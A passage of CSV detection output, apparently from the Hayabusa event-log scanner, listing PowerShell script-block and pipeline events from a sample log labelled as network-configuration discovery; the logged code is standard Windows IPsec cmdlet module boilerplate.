$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Get-NetIPsecQuickModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeSA ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 
$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = 
$myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if 
